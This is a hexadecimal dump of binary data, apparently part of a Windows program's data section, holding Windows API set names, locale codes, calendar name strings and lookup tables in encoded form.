800c88081010000d810c88081010000e42cc88081010000f038c88081010000f830c8808101000008c1c9808101000018d1c9808101000022ebc9808101000024edc9808101000030f9c9808101000038f1c980810100003cf5c980810100004089c98081010000448dc980810100004881c980810100004c85c980810100005099c980810100005891c9808101000064adc9808101000068a1c980810100006ca5c9808101000070b9c9808101000074bdc9808101000078b1c980810100007cb5c980810100008049c98081010000844dc980810100008841c980810100008c45c980810100009059c98081010000945dc980810100009851c980810100009c55c98081010000a069c98081010000a46dc98081010000a861c98081010000ac65c98081010000b079c98081010000b47dc98081010000b871c98081010000bc75c98081010000c009c98081010000c40dc98081010000c801c98081010000cc05c98081010000d019c98081010000d41dc98081010000d811c98081010000dc15c98081010000e029c98081010000f039c9808101000000caca808101000008c2ca808101000018d2ca808101000030faca8081010000408aca80810100005892ca808101000078b2ca80810100009852ca8081010000b872ca8081010000d812ca8081010000f832ca808101000020ebcb8081010000408bcb808101000068a3cb80810100008843cb8081010000b07bcb8081010000d01bcb8081010000e02bcb8081010000e42fcb8081010000f03bcb808101000000cccc808101000024e8cc808101000030fccc8081010000408ccc8081010000509ccc808101000070bccc8081010000905ccc8081010000b874cc8081010000e02ccc808101000008c5cd808101000038f5cd80810100005895cd8081010000804dcd8081010000a865cd8081010000d815cd808101000008c6ce808101000028e6ce808101000022ebc9808101000038f6ce8081010000509ece808101000070bece80810100008846ce8081010000a866ce80810100005f003d031216014c28000000000000005f003c0701060f6c5f002f111210020d6c000000000000005f002c071007020d006c0000000000005f002b1c011a10020d006c00000000005f003907120717020d006c00000000005f00291306171b1d11020d006c0000005f003c0f1e11020d006c00005f003a04030b6900000000005f002f04064402345f002d171607061b0a177400000000005f002a1b0f0d050e090b01640000000072171607061b0a175c280000204e0b12770000000000000020440109091111653d3d00003e003e003c003c00212100003d003d00211c3d005b065d00000000006f1f151713151b1d720000002d133e002a2a00002b002b002d002d002d2d00002b2b0000262600002d13142a2f2f0000252500003c3c00003c013d003e3e00003e033d002c2c0000280129007e7e00005e5e00007c7c0000260026007c007c002a173d002b163d002d103d002f123d0025183d003e00033d3c00013d261b3d007c413d005e633d006016101215030e0942270000000000006016141615030e094227000000000000601615020d004b2760140d09150a09412700000000000000600c030c020d4c530715151d0a4347121413164327000000601307061b07094027000000000000006016140312164544011607060716171b1d5527000000000060161306171b1d5244010909111d07094744011607060716171b1d5527000000600401030714191854430c011d07060716171b1d52430f031c06071742270000601310020d0d135244010909111d07094744011607060716171b1d552700000060161306171b1d52430c011d07060716171b1d52491d111713151b1d5527000060161306171b1d5244011607060716171b1d52491d111713151b1d552700000060161306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270000000060161f1b0601140d4c440d1a031c0d020608080b1a544d0c115727000000000060050d48561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000000000000060050d48561306171b1d5244011607060716171b1d52491d111713151b1d552760050d48561306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270060030c1f0959430c011d07060716171b1d52430f031c06071742270000000000601511105452171101071c070709402760250d48603206001d49000000000000600c030c020d4c56101215030e094227600c030c020d4c56101215030e0945430c011d07060716171b1d52430f031c0607174227204e0b122c065d0000000000204401090911113e065d000000000000600f0203074943020d001f1a0e40270060101c0d020608080b1a5444010909111145430f031c0607174227000000000060101c0d020608080b1a544401090911113e067d430f031c0607174227000000600d0c0f0f06020144561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000600d0c0f0f06020144561306171b1d5244011607060716171b1d52491d111713151b1d552700000060050d48561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000060050d48561306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000060041d170f0c040a434907071d1d080d05131f175246091d520727000000000060041d170f0c040a434115111d111d5444011607060716171b1d5246091d5207270000000000000060161306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000000000060161306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d552700000000000000600d0c0f0f06020144561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000000600c030c020d4c530715151d0a43541c1a1704054447121413164327000000006f1f151713151b1d520200022000000020742d09154564211610111b19041b1d5527000000000000206223121645632f0d12005364211610111b19041b1d52411554082800000000206223121645632f0d12005361330013185e27000000000020632f0d12005368210c171313110b115964211610111b19041b1d552700000020632c021d1c091111456f2d080f0617546c230c02151b1d55270000000000000000000000000000050500c0cb0b000000000000000000001d1d00c0c40400000000000000000000969600c0c404000000000000000000008d8d00c0c808000000000000000000008e8e00c0c808000000000000000000008f8f00c0c80800000000000000000000909000c0c80800000000000000000000919100c0c80800000000000000000000929200c0c80800000000000000000000939300c0c80800000000000000000000b4b602c0c80800000000000000000000b5b702c0c808000000000000000000000c0c000000000000030300000000000009090000000000006d6d737363636f6f7272656565652e2e64646c6c6c6c0000432c1d373d111d24221d0c06160073004c05498081010000000000000000000098d149808101000000000000000000005008588081010000104959808101000094dd49808101000094dd49808101000068254d8081010000cc814d8081010000305f6f80810100004c236f80810100000000000000000000eca549808101000010435380810100004c1f53808101000040317180810100007c0d71808101000064096d808101000094dd49808101000048216980810100000000000000000000000000000000000094dd4980810100000000000000000000f4bd49808101000094dd49808101000084cd498081010000602949808101000094dd49808101000060b1d18081010000b061d1808101000038fcc48081010000f021d1808101000030e2d280810100008052d28081010000e032d2808101000030e3d3808101000078bcc4808101000070a3d38081010000b063d38081010000f023d3808101000030e4d480810100008054d48081010000e034d480810100004095d580810100009045d5808101000020e4c48081010000b87cc48081010000e035d580810100006161707069692d2d6d6d73732d2d777769696e6e2d2d6161707070706d6d6f6f646465656c6c2d2d727275756e6e747469696d6d65652d2d6c6c31312d2d31312d2d31310000000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6464616174746565747469696d6d65652d2d6c6c31312d2d31312d2d313100006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d666669696c6c65652d2d6c6c32322d2d31312d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6c6c31312d2d32322d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6f6f626273736f6f6c6c6565747465652d2d6c6c31312d2d32322d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d707072726f6f636365657373737374746868727265656161646473732d2d6c6c31312d2d31312d2d32320000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737474727269696e6e67672d2d6c6c31312d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737979737369696e6e66666f6f2d2d6c6c31312d2d32322d2d3131000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d777769696e6e727274742d2d6c6c31312d2d31312d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d7878737374746161747465652d2d6c6c32322d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d7272747463636f6f727265652d2d6e6e747475757373656572722d2d777769696e6e64646f6f77772d2d6c6c31312d2d31312d2d3030000000006161707069692d2d6d6d73732d2d777769696e6e2d2d737365656363757572726969747479792d2d737379797373747465656d6d666675756e6e6363747469696f6f6e6e73732d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6b6b656572726e6e65656c6c333332322d2d7070616163636b6b6161676765652d2d636375757272727265656e6e74742d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d6464696961616c6c6f6f676762626f6f78782d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d777769696e6e64646f6f7777737374746161747469696f6f6e6e2d2d6c6c31312d2d31312d2d303000000000757573736565727233333232000000000202000012120000020200001212000002020000121200000202000012120000000000000e0e000047221137360700170b1a243102080a06022c2d6400000000080800001212000004040000121200004c0f0e2c112327061b0709223d78000004040000121200004c230c020d092b2f0c08313b230f0a0d44000000000000000101000016160000020200000202000003030000020200000404000018180000050500000d0d00000606000009090000070700000c0c0000080800000c0c0000090900000c0c00000a0a0000070700000b0b0000080800000c0c0000161600000d0d0000161600000f0f000002020000101000000d0d000011110000121200001212000002020000212100000d0d00003535000002020000414100000d0d000043430000020200005050000011110000525200000d0d0000535300000d0d00005757000016160000595900000b0b00006c6c00000d0d00006d6d000020200000707000001c1c000072720000090900000606000016160000808000000a0a0000818100000a0a000082820000090900008383000016160000848400000d0d000091910000292900009e9e00000d0d0000a1a1000002020000a4a400000b0b0000a7a700000d0d0000b7b7000011110000cece000002020000d7d700000b0b0000181f07000c0c0000f82fd7808101000008d0d8808101000018c0d8808101000028f0d880810100006a6a61612d2d4a4a50500000000000007a7a68682d2d43434e4e0000000000006b6b6f6f2d2d4b4b52520000000000007a7a68682d2d54545757000000000000000000000000000000dbdb808101000004dfdb808101000008d3db80810100000cd7db808101000010cbdb808101000014cfdb808101000018c3db80810100001cc7db808101000024ffdb808101000030ebdb808101000038e3db80810100004893db8081010000548fdb808101000060bbdb80810100006cb7db808101000070abdb808101000074afdb808101000078a3db80810100007ca7db8081010000805bdb8081010000845fdb80810100008853db80810100008c57db8081010000904bdb8081010000944fdb80810100009843db8081010000a07bdb8081010000a873db8081010000b46fdb8081010000bc67db80810100007ca7db8081010000c41fdb8081010000cc17db8081010000d40fdb8081010000e03bdb8081010000f02bdb8081010000f823db808101000008d4dc808101000014c8dc808101000018c4dc808101000020fcdc808101000030ecdc80810100004894dc808101000001010000000000005884dc808101000060bcdc808101000068b4dc808101000070acdc808101000078a4dc8081010000805cdc80810100008854dc8081010000904cdc8081010000a07cdc8081010000b06cdc8081010000c01cdc8081010000d804dc8081010000f02cdc808101000000dddd808101000018c5dd808101000020fddd808101000028f5dd808101000030eddd808101000038e5dd8081010000409ddd80810100004895dd8081010000508ddd80810100005885dd808101000060bddd808101000068b5dd808101000070addd808101000078a5dd80810100008855dd8081010000a07ddd8081010000b06ddd808101000038e5dd8081010000c01ddd8081010000d00ddd8081010000e03ddd8081010000f02ddd808101000008d6de808101000018c6de808101000030eede8081010000449ade80810100004c92de80810100005886de808101000070aede80810100009846de8081010000b06ede808101000053261b6e4d22016e5421106557320164543c1d7546341b695332157453261b0a051879004d22010a051879000000000054211016170518795732010a0b1617051879000000000000543c1d07011705187900000046341b0d05187900000000005332150107160518790000004a2b0f6e462307624d2c1372413102724d2c18794a3f1b6e4a3f196c41341267533615704f2c17744e21197644210663000000004a2b0f1b14130b79462307100714130b790000004d2c13110b6800004131021b056c00004a3f1b0b650000004a3f1915790000004134121206077400000000005336150411080f0717720000000000004f2c171b0d0717724e211913080f0717720000000000000044210606080f071772000000410c4d00501d4d00000000004d00624b004b5600790000000000000064000000480c6d0000006d4400480c59000000790000000048007257005749007300000000000000535375756e6e00004d4d6f6f6e6e000054547575656500005757656564640000545468687575000046467272696900005353616174740000535375756e6e646461617979000000004d4d6f6f6e6e64646161797900000000545475756565737364646161797900005757656564646e6e65657373646461617979000000000000545468687575727273736464616179790000000000000000464672726969646461617979000000005353616174747575727264646161797900000000000000004a4a61616e6e000046466565626200004d4d61617272000041417070727200004d4d6161797900004a4a75756e6e00004a4a75756c6c0000414175756767000053536565707000004f4f6363747400004e4e6f6f7676000044446565636300004a4a61616e6e757561617272797900004646656562627272757561617272797900000000000000004d4d616172726363686800000000000041417070727269696c6c0000000000004a4a75756e6e656500000000000000004a4a75756c6c7979000000000000000041417575676775757373747400000000535365657070747465656d6d6262656572720000000000004f4f636374746f6f62626565727200004e4e6f6f767665656d6d626265657272000000000000000044446565636365656d6d6262656572720000000041414d4d0000000050504d4d00000000000000004d4d4d4d2f2f646464642f2f79797979000000000000000064646464646464642c2c20204d4d4d4d4d4d4d4d2020646464642c2c202079797979797979790000484848483a3a6d6d6d6d3a3a73737373000000000000000065656e6e2d2d5555535300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000202020202020202020202020202020202020282828282828282828282020202020202020202020202020202020202020202020202020202020202020202020204848101010101010101010101010101010101010101010101010101010101010848484848484848484848484848484848484848410101010101010101010101010108181818181818181818181810101010101010101010101010101010101010101010101010101010101010101010101010101010110101010101010101010101082828282828282828282828202020202020202020202020202020202020202020202020202020202020202020202020202020202101010101010101020200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f210301070103010f010301070103011f010301070103010f010321070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f210301070103010f010301070103011f010301070103010f01032107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301fe0100000000000000f3f38081010000020200000000000008fbf38081010000030300000000000010e3f38081010000040400000000000018ebf38081010000050500000000000028dbf38081010000060600000000000030c3f38081010000070700000000000038cbf38081010000080800000000000040b3f38081010000090900000000000048bbf380810100000a0a00000000000050a3f380810100000b0b00000000000058abf380810100000c0c0000000000006093f380810100000d0d000000000000689bf380810100000e0e0000000000007083f380810100000f0f000000000000788bf3808101000010100000000000008073f380810100001111000000000000887bf3808101000012120000000000009063f380810100001313000000000000986bf380810100001414000000000000a053f380810100001515000000000000a85bf380810100001616000000000000b043f380810100001818000000000000b84bf380810100001919000000000000c033f380810100001a1a000000000000c83bf380810100001b1b000000000000d023f380810100001c1c000000000000d82bf380810100001d1d000000000000e013f380810100001e1e000000000000e81bf380810100001f1f000000000000f003f380810100002020000000000000f80bf38081010000212100000000000000f4f48081010000222200000000000008fcf48081010000232300000000000010e4f48081010000242400000000000018ecf48081010000252500000000000020d4f48081010000262600000000000028dcf48081010000272700000000000030c4f48081010000292900000000000038ccf480810100002a2a00000000000040b4f480810100002b2b00000000000048bcf480810100002c2c00000000000050a4f480810100002d2d00000000000058acf480810100002f2f0000000000006094f480810100003636000000000000689cf4808101000037370000000000007084f480810100003838000000000000788cf4808101000039390000000000008074f480810100003e3e000000000000887cf480810100003f3f0000000000009064f480810100004040000000000000986cf480810100004141000000000000a054f480810100004343000000000000a85cf480810100004444000000000000b044f480810100004646000000000000b84cf480810100004747000000000000c034f480810100004949000000000000c83cf480810100004a4a000000000000d024f480810100004b4b000000000000d82cf480810100004e4e000000000000e014f480810100004f4f000000000000e81cf480810100005050000000000000f004f480810100005656000000000000f80cf48081010000575700000000000000f5f580810100005a5a00000000000008fdf58081010000656500000000000010e5f580810100007f7f00000000000018edf58081010000010504000000000020d5f58081010000020604000000000030c5f58081010000030704000000000040b5f58081010000040004000000000028f0d88081010000050104000000000050a5f5808101000006020400000000006095f5808101000007030400000000007085f58081010000080c0400000000008075f58081010000090d040000000000b06ede80810100000b0f0400000000009065f580810100000c08040000000000a055f580810100000d09040000000000b045f580810100000e0a040000000000c035f580810100000f0b040000000000d025f580810100001014040000000000e015f580810100001115040000000000f82fd78081010000121604000000000018c0d880810100001317040000000000f005f58081010000141004000000000000f6f68081010000151104000000000010e6f68081010000161204000000000020d6f68081010000181c04000000000030c6f68081010000191d04000000000040b6f680810100001a1e04000000000050a6f680810100001b1f0400000000006096f680810100001c180400000000007086f680810100001d190400000000008076f680810100001e1a0400000000009066f680810100001f1b040000000000a056f680810100002024040000000000b046f680810100002125040000000000c036f680810100002226040000000000d026f680810100002327040000000000e016f680810100002420040000000000f006f68081010000252104000000000000f7f78081010000262204000000000010e7f78081010000272304000000000020d7f78081010000292d04000000000030c7f780810100002a2e04000000000040b7f780810100002b2f04000000000050a7f780810100002c280400000000006097f780810100002d29040000000000788ff780810100002f2b040000000000887ff780810100003236040000000000986ff780810100003430040000000000a85ff780810100003531040000000000b84ff780810100003632040000000000c83ff780810100003733040000000000d82ff78081010000383c040000000000e81ff78081010000393d040000000000f80ff780810100003a3e04000000000008f0f880810100003b3f04000000000018e0f880810100003e3a04000000000028d0f880810100003f3b04000000000038c0f88081010000404404000000000048b0f88081010000414504000000000058a0f8808101000043470400000000006890f8808101000044400400000000008078f8808101000045410400000000009068f880810100004642040000000000a058f880810100004743040000000000b048f88081010000494d040000000000c038f880810100004a4e040000000000d028f880810100004b4f040000000000e018f880810100004c48040000000000f008f880810100004e4a04000000000000f9f980810100004f4b04000000000010e9f98081010000505404000000000020d9f98081010000525604000000000030c9f98081010000565204000000000040b9f98081010000575304000000000050a9f980810100005a5e0400000000006099f9808101000065610400000000007089f980810100006b6f0400000000008079f980810100006c680400000000009069f980810100008185040000000000a059f980810100000109080000000000b049f98081010000040c08000000000008d0d88081010000070f080000000000c039f980810100000901080000000000d029f980810100000a02080000000000e019f980810100000c04080000000000f009f98081010000101808000000000000fafa8081010000131b08000000000010eafa8081010000141c08000000000020dafa8081010000161e08000000000030cafa80810100001a1208000000000040bafa80810100001d1508000000000058a2fa80810100002c240800000000006892fa80810100003b33080000000000807afa80810100003e36080000000000906afa8081010000434b080000000000a05afa80810100006b63080000000000b842fa8081010000010d0c0000000000c832fa808101000004080c0000000000d822fa8081010000070b0c0000000000e812fa808101000009050c0000000000f802fa80810100000a060c000000000008f3fb80810100000c000c000000000018e3fb80810100001a160c000000000028d3fb80810100003b370c000000000040bbfb80810100006b670c000000000050abfb80810100000111100000000000609bfb80810100000414100000000000708bfb80810100000717100000000000807bfb80810100000919100000000000906bfb80810100000a1a100000000000a05bfb80810100000c1c100000000000b04bfb80810100001a0a100000000000c03bfb80810100003b2b100000000000d02bfb80810100000115140000000000e01bfb80810100000410140000000000f00bfb8081010000071314000000000000fcfc8081010000091d14000000000010ecfc80810100000a1e14000000000020dcfc80810100000c1814000000000030ccfc80810100001a0e14000000000040bcfc80810100003b2f14000000000058a4fc808101000001191800000000006894fc808101000009111800000000007884fc80810100000a121800000000008874fc80810100000c141800000000009864fc80810100001a02180000000000a854fc80810100003b23180000000000c03cfc8081010000011d1c0000000000d02cfc808101000009151c0000000000e01cfc80810100000a161c0000000000f00cfc80810100001a061c000000000000fdfd80810100003b271c000000000018e5fd8081010000012120000000000028d5fd8081010000092920000000000038c5fd80810100000a2a20000000000048b5fd80810100003b1b20000000000058a5fd808101000001252400000000006895fd8081010000092d2400000000007885fd80810100000a2e2400000000008875fd80810100003b1f2400000000009865fd80810100000129280000000000a855fd80810100000921280000000000b845fd80810100000a22280000000000c835fd8081010000012d2c0000000000d825fd808101000009252c0000000000e815fd80810100000a262c0000000000f805fd8081010000013130000000000008f6fe8081010000093930000000000018e6fe80810100000a3a30000000000028d6fe8081010000013534000000000038c6fe8081010000093d34000000000048b6fe80810100000a3e34000000000058a6fe808101000001393800000000006896fe80810100000a323800000000007886fe8081010000013d3c00000000008876fe80810100000a363c00000000009866fe80810100000141400000000000a856fe80810100000a4a400000000000b846fe80810100000a4e440000000000c836fe80810100000a42480000000000d826fe80810100000a464c0000000000e816fe80810100000a5a500000000000f806fe808101000004787c000000000008f7ff80810100001a667c000000000018e7ff80810100006161727200000000626267670000000063636161000000007a7a68682d2d4343484853530000000063637373000000006464616100000000646465650000000065656c6c0000000065656e6e0000000065657373000000006666696900000000666672720000000068686565000000006868757500000000696973730000000069697474000000006a6a6161000000006b6b6f6f000000006e6e6c6c000000006e6e6f6f0000000070706c6c00000000707074740000000072726f6f000000007272757500000000686872720000000073736b6b0000000073737171000000007373767600000000747468680000000074747272000000007575727200000000696964640000000075756b6b00000000626265650000000073736c6c0000000065657474000000006c6c7676000000006c6c74740000000066666161000000007676696900000000686879790000000061617a7a0000000065657575000000006d6d6b6b0000000061616666000000006b6b61610000000066666f6f0000000068686969000000006d6d7373000000006b6b6b6b000000006b6b797900000000737377770000000075757a7a00000000747474740000000070706161000000006767757500000000747461610000000074746565000000006b6b6e6e000000006d6d72720000000073736161000000006d6d6e6e0000000067676c6c000000006b6b6f6f6b6b0000737379797272000064646969767600000000000000000000616172722d2d53534141000000000000626267672d2d42424747000000000000636361612d2d45455353000000000000636373732d2d43435a5a000000000000646461612d2d44444b4b000000000000646465652d2d4444454500000000000065656c6c2d2d47475252000000000000666669692d2d46464949000000000000666672722d2d46465252000000000000686865652d2d49494c4c000000000000686875752d2d48485555000000000000696973732d2d49495353000000000000696974742d2d494954540000000000006e6e6c6c2d2d4e4e4c4c0000000000006e6e62622d2d4e4e4f4f00000000000070706c6c2d2d50504c4c000000000000707074742d2d4242525200000000000072726f6f2d2d52524f4f000000000000727275752d2d52525555000000000000686872722d2d4848525200000000000073736b6b2d2d53534b4b000000000000737371712d2d41414c4c000000000000737376762d2d53534545000000000000747468682d2d54544848000000000000747472722d2d54545252000000000000757572722d2d50504b4b000000000000696964642d2d4949444400000000000075756b6b2d2d55554141000000000000626265652d2d4242595900000000000073736c6c2d2d53534949000000000000656574742d2d454545450000000000006c6c76762d2d4c4c56560000000000006c6c74742d2d4c4c5454000000000000666661612d2d49495252000000000000767669692d2d56564e4e000000000000686879792d2d41414d4d00000000000061617a7a2d2d41415a5a2d2d4c4c616174746e6e00000000656575752d2d454553530000000000006d6d6b6b2d2d4d4d4b4b00000000000074746e6e2d2d5a5a4141000000000000787868682d2d5a5a41410000000000007a7a75752d2d5a5a4141000000000000616166662d2d5a5a41410000000000006b6b61612d2d4747454500000000000066666f6f2d2d46464f4f000000000000686869692d2d49494e4e0000000000006d6d74742d2d4d4d5454000000000000737365652d2d4e4e4f4f0000000000006d6d73732d2d4d4d59590000000000006b6b6b6b2d2d4b4b5a5a0000000000006b6b79792d2d4b4b4747000000000000737377772d2d4b4b454500000000000075757a7a2d2d55555a5a2d2d4c4c616174746e6e00000000747474742d2d5252555500000000000062626e6e2d2d49494e4e000000000000707061612d2d49494e4e000000000000676775752d2d49494e4e000000000000747461612d2d49494e4e000000000000747465652d2d49494e4e0000000000006b6b6e6e2d2d49494e4e0000000000006d6d6c6c2d2d49494e4e0000000000006d6d72722d2d49494e4e000000000000737361612d2d49494e4e0000000000006d6d6e6e2d2d4d4d4e4e000000000000636379792d2d4747424200000000000067676c6c2d2d454553530000000000006b6b6f6f6b6b2d2d49494e4e000000007373797972722d2d53535959000000006464696976762d2d4d4d565600000000717175757a7a2d2d42424f4f000000006e6e73732d2d5a5a41410000000000006d6d69692d2d4e4e5a5a000000000000616172722d2d49495151000000000000646465652d2d4343484800000000000065656e6e2d2d47474242000000000000656573732d2d4d4d5858000000000000666672722d2d42424545000000000000696974742d2d434348480000000000006e6e6c6c2d2d424245450000000000006e6e6e6e2d2d4e4e4f4f000000000000707074742d2d50505454000000000000737372722d2d535350502d2d4c4c616174746e6e00000000737376762d2d4646494900000000000061617a7a2d2d41415a5a2d2d4343797972726c6c00000000737365652d2d535345450000000000006d6d73732d2d42424e4e00000000000075757a7a2d2d55555a5a2d2d4343797972726c6c00000000717175757a7a2d2d4545434300000000616172722d2d454547470000000000007a7a68682d2d48484b4b000000000000646465652d2d4141545400000000000065656e6e2d2d41415555000000000000656573732d2d45455353000000000000666672722d2d43434141000000000000737372722d2d535350502d2d4343797972726c6c00000000737365652d2d46464949000000000000717175757a7a2d2d5050454500000000616172722d2d4c4c59590000000000007a7a68682d2d53534747000000000000646465652d2d4c4c555500000000000065656e6e2d2d43434141000000000000656573732d2d47475454000000000000666672722d2d43434848000000000000686872722d2d4242414100000000000073736d6d6a6a2d2d4e4e4f4f00000000616172722d2d44445a5a0000000000007a7a68682d2d4d4d4f4f000000000000646465652d2d4c4c494900000000000065656e6e2d2d4e4e5a5a000000000000656573732d2d43435252000000000000666672722d2d4c4c5555000000000000626273732d2d424241412d2d4c4c616174746e6e0000000073736d6d6a6a2d2d5353454500000000616172722d2d4d4d414100000000000065656e6e2d2d49494545000000000000656573732d2d50504141000000000000666672722d2d4d4d4343000000000000737372722d2d424241412d2d4c4c616174746e6e0000000073736d6d61612d2d4e4e4f4f00000000616172722d2d54544e4e00000000000065656e6e2d2d5a5a4141000000000000656573732d2d44444f4f000000000000737372722d2d424241412d2d4343797972726c6c0000000073736d6d61612d2d5353454500000000616172722d2d4f4f4d4d00000000000065656e6e2d2d4a4a4d4d000000000000656573732d2d5656454500000000000073736d6d73732d2d4646494900000000616172722d2d5959454500000000000065656e6e2d2d43434242000000000000656573732d2d43434f4f00000000000073736d6d6e6e2d2d4646494900000000616172722d2d5353595900000000000065656e6e2d2d42425a5a000000000000656573732d2d50504545000000000000616172722d2d4a4a4f4f00000000000065656e6e2d2d54545454000000000000656573732d2d41415252000000000000616172722d2d4c4c424200000000000065656e6e2d2d5a5a5757000000000000656573732d2d45454343000000000000616172722d2d4b4b575700000000000065656e6e2d2d50504848000000000000656573732d2d43434c4c000000000000616172722d2d41414545000000000000656573732d2d55555959000000000000616172722d2d42424848000000000000656573732d2d50505959000000000000616172722d2d51514141000000000000656573732d2d42424f4f000000000000656573732d2d53535656000000000000656573732d2d48484e4e000000000000656573732d2d4e4e4949000000000000656573732d2d505052520000000000007a7a68682d2d43434848545400000000737372720000000018edf580810100004242000000000000689cf480810100002c2c000000000000606d0c8181010000717100000000000000f3f380810100000000000000000000707d0c8181010000d8d8000000000000808d0c8181010000dada000000000000909d0c8181010000b1b1000000000000a0ad0c8181010000a0a0000000000000b0bd0c81810100008f8f000000000000c0cd0c8181010000cfcf000000000000d0dd0c8181010000d5d5000000000000e0ed0c8181010000d2d2000000000000f0fd0c8181010000a9a9000000000000000e0f8181010000b9b9000000000000101e0f8181010000c4c4000000000000202e0f8181010000dcdc000000000000303e0f81810100004343000000000000404e0f8181010000cccc000000000000505e0f8181010000bfbf000000000000606e0f8181010000c8c800000000000050a4f480810100002929000000000000707e0f81810100009b9b00000000000088860f81810100006b6b00000000000010e4f480810100002121000000000000a0ae0f8181010000636300000000000008fbf380810100000101000000000000b0be0f81810100004444000000000000c0ce0f81810100007d7d000000000000d0de0f8181010000b7b700000000000010e3f380810100000202000000000000e8e60f8181010000454500000000000028dbf380810100000404000000000000f8f60f8181010000474700000000000008070e8181010000878700000000000030c3f38081010000050500000000000018170e8181010000484800000000000038cbf38081010000060600000000000028270e8181010000a2a200000000000038370e8181010000919100000000000048470e8181010000494900000000000058570e8181010000b3b300000000000068670e8181010000abab00000000000010e5f58081010000414100000000000078770e81810100008b8b00000000000040b3f38081010000070700000000000088870e81810100004a4a00000000000048bbf38081010000080800000000000098970e8181010000a3a3000000000000a8a70e8181010000cdcd000000000000b8b70e8181010000acac000000000000c8c70e8181010000c9c9000000000000d8d70e81810100009292000000000000e8e70e8181010000baba000000000000f8f70e8181010000c5c50000000000000818118181010000b4b40000000000001808118181010000d6d60000000000002838118181010000d0d000000000000038281181810100004b4b0000000000004858118181010000c0c00000000000005848118181010000d3d300000000000050a3f3808101000009090000000000006878118181010000d1d10000000000007868118181010000dddd0000000000008898118181010000d7d70000000000009888118181010000caca000000000000a8b8118181010000b5b5000000000000b8a8118181010000c1c1000000000000c8d8118181010000d4d4000000000000d8c8118181010000a4a4000000000000e8f8118181010000adad000000000000f8e8118181010000dfdf000000000000081910818101000093930000000000001809108181010000e0e00000000000002839108181010000bbbb0000000000003829108181010000cece0000000000004859108181010000e1e10000000000005849108181010000dbdb0000000000006879108181010000dede0000000000007869108181010000d9d90000000000008899108181010000c6c600000000000020d4f4808101000023230000000000009889108181010000656500000000000058acf480810100002a2a000000000000a8b91081810100006c6c00000000000038ccf480810100002626000000000000b8a9108181010000686800000000000058abf380810100000a0a000000000000c8d91081810100004c4c000000000000788cf480810100002e2e000000000000d8c910818101000073730000000000006093f380810100000b0b000000000000e8f91081810100009494000000000000f8e9108181010000a5a5000000000000081a138181010000aeae000000000000180a1381810100004d4d000000000000283a138181010000b6b6000000000000382a138181010000bcbc000000000000f80cf480810100003e3e000000000000485a1381810100008888000000000000c034f480810100003737000000000000584a1381810100007f7f000000000000689bf380810100000c0c000000000000687a1381810100004e4e0000000000008074f480810100002f2f000000000000786a1381810100007474000000000000c83bf380810100001818000000000000889a138181010000afaf000000000000988a1381810100005a5a0000000000007083f380810100000d0d000000000000a8ba1381810100004f4f00000000000048bcf480810100002828000000000000b8aa1381810100006a6a00000000000000f4f480810100001f1f000000000000c8da1381810100006161000000000000788bf380810100000e0e000000000000d8ca13818101000050500000000000008073f380810100000f0f000000000000e8fa1381810100009595000000000000f8ea1381810100005151000000000000887